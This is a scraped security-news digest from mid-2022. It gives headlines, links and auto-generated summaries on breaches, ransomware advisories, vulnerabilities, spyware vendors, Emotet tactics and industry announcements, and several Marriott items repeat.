      Autosummary: “We see increasing regulation and demand for security in almost every IoT market, ranging from consumer IoT, automotive, industrial, telco, medical, and asset tracking,” said Frédéric Thomas, CTO of Kudelski IoT. "


      Ericsson partners with Thales and Qualcomm to deploy 5G networks into space

      industry
      2022-07-11 https://www.helpnetsecurity.com/2022/07/12/ericsson-thales-qualcomm/

      Ericsson, Thales, and Qualcomm Technologies are planning to take 5G out of this world and across a network of Earth-orbiting satellites. After having each conducted detailed research, which included multiple studies and simulations, the parties plan to enter smartphone-use-case-focused testing and validation of 5G non-terrestrial networks (5G NTN). The result could effectively mean that a future 5G smartphone could use 5G connectivity anywhere on Earth and provide complete global coverage for wideband data services, including … More

      The post Ericsson partners with Thales and Qualcomm to deploy 5G networks into space appeared first on Help Net Security.

      "

      Autosummary: Erik Ekudden, Senior Vice President and Chief Technology Officer, Ericsson, says: “This testing and validation cooperation between Ericsson, Thales and Qualcomm Technologies will be a major milestone in the history of communications as the ultimate result could effectively mean that no matter where you are on Earth – in the middle of an ocean or the remotest forest – high-end, secure and cost-effective connectivity will be available through collaborative 5G satellite and terrestrial connectivity.” "


      Apple slaps hard against ‘mercenary’ surveillance-as-a-service industry

      industry
      2022-07-07 https://www.computerworld.com/article/3666688/apple-slaps-hard-against-mercenary-surveillance-as-a-service-industry.html#tk.rss_security

      Apple has struck a big blow against the mercenary “surveillance-as-a-service” industry, introducing a new, highly secure Lockdown Mode to protect individuals at the greatest risk of targeted attacks. The company is also offering millions of dollars to support research to expose such threats.

      Starting in iOS 16, iPadOS 16 and macOS Ventura, and available now in the latest developer-only betas, Lockdown Mode hardens security defenses and limits the functionalities sometimes abused by state-sponsored surveillance hackers. Apple describes this protection as “sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.”

      Autosummary: “We congratulate [Apple] for providing protection to human rights defenders, heads of state, lawyers, activists, journalists, and more,” tweeted the EFF, a privacy advocacy group. Apple is also making a $10 million grant, plus any damages awarded from the lawsuit it is pursuing against NSO Group, to support organizations that investigate, expose, and prevent highly targeted cyberattacks, including those created by private companies developing state-sponsored mercenary spyware. Victims have included journalists, politicians, civil society advocates, activists, and diplomats, so while the numbers are small, the chilling impact of such surveillance is vast. Ford Foundation Tech and Society Program director Lori McGlinchey said: “The global spyware trade targets human rights defenders, journalists, and dissidents; it facilitates violence, reinforces authoritarianism, and supports political repression.” “Apple’s newly released Lockdown Mode will reduce the attack surface, increase costs for spyware firms, and thus make it much harder for repressive governments to hack high-risk users,” said John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto's Munk School of Global Affairs and Public Policy.


      North Korea-linked APTs use Maui Ransomware to target the Healthcare industry

      exploits ransomware industry
      2022-07-07 https://securityaffairs.co/wordpress/132978/malware/maui-ransomware-joint-alert.html

      US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warns of North Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […]

      The post North Korea-linked APTs use Maui Ransomware to target the Healthcare industry appeared first on Security Affairs.

      "

      Autosummary: "


      Marriott confirms data breach and a failed extortion attempt

      financial industry
      2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-data-breach-and-a-failed-extortion-attempt/
      Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

      Autosummary: Data breach affected 300-400 individuals. While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


      Google to delete location data of trips to abortion clinics

      industry
      2022-07-06 https://blog.malwarebytes.com/privacy-2/2022/07/google-to-delete-location-data-of-trips-to-abortion-clinics/

      Google upped its privacy efforts by deleting location history of visits to abortion clinics.

      The post Google to delete location data of trips to abortion clinics appeared first on Malwarebytes Labs.

      "

      Autosummary: These include abortion clinics, addiction treatment facilities, counseling centers, domestic violence shelters, fertility centers, and other places deemed as sensitive locations. "


      Marriott hit by new data breach and a failed extortion attempt

      financial industry
      2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-hit-by-new-data-breach-and-a-failed-extortion-attempt/
      Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

      Autosummary: Data breach affected 300-400 individuals. While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


      Marriott International suffered a new data breach, attackers stole 20GB of data

      financial industry
      2022-07-06 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html

      Hotel chain Marriott International suffered a new data breach; a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland (BWIA), […]

      The post Marriott International suffered a new data breach, attackers stole 20GB of data appeared first on Security Affairs.

      "

      Autosummary: “Marriott acknowledged that while most of the data acquired by GNN was what Marriott described as non-sensitive internal business files, they will be notifying approximately 300-400 individuals and any regulators, as required. "


      Marriott confirms another data breach after hotel got hacked

      financial industry
      2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-another-data-breach-after-hotel-got-hacked/
      Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

      Autosummary: Data breach affected 300-400 individuals. While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


      MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs

      industry
      2022-07-05 https://www.helpnetsecurity.com/2022/07/06/metricstream-gaurav-kapoor-prasad-sabbineni/

      MetricStream announced that Gaurav Kapoor and Prasad Sabbineni have been appointed as co-Chief Executive Officers. MetricStream has grown consistently over the last decade to become an established market leader in the GRC space. Over the past two years, MetricStream benefited from Bruce Dahlgren’s leadership as CEO by expanding the go-to-market with fresh branding, a simplified product portfolio, strategic partnerships, and accelerated GRC SaaS leadership. Last quarter, Dahlgren moved to an advisory role and helped transition … More

      The post MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs appeared first on Help Net Security.

      "

      Autosummary: He oversaw technology for enterprise GRC functions of Risk Management, Compliance, Internal Audit, Information Security, Third-Party Management as well as Finance, Treasury, HR, Data, across the entire bank globally at Citi. "


      NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks

      industry ciber
      2022-07-01 https://www.helpnetsecurity.com/2022/07/01/nxm-autonomous-security-platform/

      NXM Labs unveiled its NXM Autonomous Security platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA). NXM’s … More

      The post NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks appeared first on Help Net Security.

      "

      Autosummary: "


      Siemens and NVIDIA join forces to enable industrial metaverse

      industry
      2022-06-30 https://www.helpnetsecurity.com/2022/07/01/siemens-nvidia/

      Siemens and NVIDIA announced an expansion of their partnership to enable the industrial metaverse and increase use of AI-driven digital twin technology that will help bring industrial automation to a new level. As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. This will enable an industrial metaverse with physics-based digital models from Siemens and real-time AI … More

      The post Siemens and NVIDIA join forces to enable industrial metaverse appeared first on Help Net Security.

      "

      Autosummary: As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. "


      New "FabricScape" Bug in Microsoft Azure Service Fabric Impacts Linux Workloads

      exploits industry
      2022-06-29 https://thehackernews.com/2022/06/new-fabricscape-bug-in-microsoft-azure.html
      Cybersecurity researchers from Palo Alto Networks Unit 42 disclosed details of a new security flaw affecting Microsoft's Service Fabric that could be exploited to obtain elevated permissions and seize control of all nodes in a cluster. The issue, which has been dubbed FabricScape (CVE-2022-30137), could be exploited on containers that are configured to have runtime access. It has been remediated

      Autosummary: "The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource's host SF node and the entire cluster," Microsoft said as part of the coordinated disclosure process.


      APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

      industry
      2022-06-29 https://thehackernews.com/2022/06/apt-hackers-targeting-industrial.html
      Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include

      Autosummary: "However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures."


      Critical Security Flaws Identified in CODESYS ICS Automation Software

      industry
      2022-06-27 https://thehackernews.com/2022/06/critical-security-flaws-identified-in.html
      CODESYS has released patches to address as many as 11 security flaws that, if successfully exploited, could result in information disclosure and a denial-of-service (DoS) condition, among others. "These vulnerabilities are simple to exploit, and they can be successfully exploited to cause consequences such as sensitive information leakage, PLCs entering a severe fault state, and arbitrary code


      Italy Data Protection Authority Warns Websites Against Use of Google Analytics

      industry
      2022-06-27 https://thehackernews.com/2022/06/italy-data-protection-authority-warns.html
      Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U. data protection regulations. The Garante per la Protezione dei Dati Personali, in a press release published last week, called out a local web publisher for using the widely used analytics tool in a manner that


      The surveillance-as-a-service industry needs to be brought to heel

      industry
      2022-06-24 https://www.computerworld.com/article/3665052/the-surveillance-as-a-service-industry-needs-to-be-brought-to-heel.html#tk.rss_security

      Here we go again: another example of government surveillance involving smartphones from Apple and Google has emerged, and it shows how sophisticated government-backed attacks can become and why there's justification for keeping mobile platforms utterly locked down.

      What has happened?

      I don’t intend to focus too much on the news, but in brief it is as follows:

      • Google’s Threat Analysis Group has published information revealing the hack.
      • Italian surveillance firm RCS Labs created the attack.
      • The attack has been used in Italy and Kazakhstan, and possibly elsewhere.
      • Some generations of the attack are wielded with help from ISPs.
      • On iOS, attackers abused Apple’s enterprise certification tools that enable in-house app deployment.
      • Around nine different attacks were used.

      The attack works like this: The target is sent a unique link that aims to trick them into downloading and installing a malicious app. In some cases, the spooks worked with an ISP to disable data connectivity to trick targets into downloading the app to recover that connection.

      Autosummary: And while Apple, Google, and everyone else remain committed to a cat-and-mouse game to prevent such criminality, closing exploits where they can, the risk is that any government-mandated back door or device security flaw will eventually slip into the commercial markets, from which it will reach the criminal ones. Not only this, but these private surveillance companies are enabling dangerous hacking tools to proliferate, while making these high-tech snooping facilities available to governments — some of which seem to enjoy spying on dissidents, journalists, political opponents, and human rights workers. As part of that, they must respect EU law, judicial review, criminal procedural rights and agree to no import of illegal intelligence, no political abuse of national security and to support civil society.


      How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security

      industry
      2022-06-16 https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/

      Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents?

      The post How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security appeared first on WeLiveSecurity

      "

      Autosummary: Recognizing this potential abuse of macros, during the heyday of Word 97 Microsoft introduced the first built-in security feature in Word that blocked Visual Basic for Applications (VBA) macros from running: This feature continued to be developed in later versions of Office, now probably most familiar via the yellow Message Bar with the “Enable Content” button introduced in Office 2010: Since then, two clicks have been typically required to enable macros: first, clicking on “Enable Editing”, which removes the document from Protected View, a security feature in place since Office 2010 that provides a read-only, sandboxed environment; second, clicking on “Enable Content”, which allows the macros to run.Specifically, Guildma stored all of its malicious modules, including a couple of tools from Nirsoft for extracting saved credentials from popular email clients and web browsers, as the streams of the single desktop.ini file: desktop.ini:nauwuygiaa.jpg (MailPassView) (MailPassView) desktop.ini:nauwuygiab.jpg (BrowserPassView)… For targeting air-gapped networks, malicious actors have used streams to hide malicious components within otherwise innocuous-looking files on USB drives. When double-clicked, a shortcut file can launch a target resource, in this case, a PowerShell script that downloaded and executed Emotet: Most detections were in Japan (28%), Italy (16%), and Mexico (11%). In an earlier test campaign between April 4th and April 19th, the Emotet operators attracted victims to a ZIP archive, stored on OneDrive, containing Microsoft Excel Add-in (XLL) files, which are used to add custom functions to Excel.Identifier is a well-known stream name that modern browsers and some other applications automatically add or propagate to files to indicate their zone: the internet, the intranet, the trusted zone, the restricted zone, or the local machine. "


      Why Industry 4.0 must think more like Apple

      industry
      2022-05-31 https://www.computerworld.com/article/3662131/why-industry-40-must-think-more-like-apple.html#tk.rss_security

      For industrial applications, the Internet of Things risks becoming the Internet of Thieves. Perhaps industries making use of connected solutions should take a leaf out of the Apple book and lock down their infrastructure.

      What the ethical hackers say

      As digital processes become deeply embedded across every industry, it makes sense that industrial control systems were tested at this year’s Pwn2Own contest. Hackers were asked to seek out vulnerabilities in industrial software and systems.

      Contest winners Daan Keuper and Thijs Alkemade found that once they managed to break into the IT networks used at these companies, it was “relatively easy” to then cause havoc with systems and equipment.

      Autosummary: IT understands this, of course, which is why industrial IoT deployments tend to secure the IT networks they use, but this also means that if those networks are penetrated, much of the deployed equipment lacks additional protection. Louis Priem, consultant at ICT Group, said, “Systems in factory environments typically run 24/7, so there is very little opportunity to patch vulnerabilities.”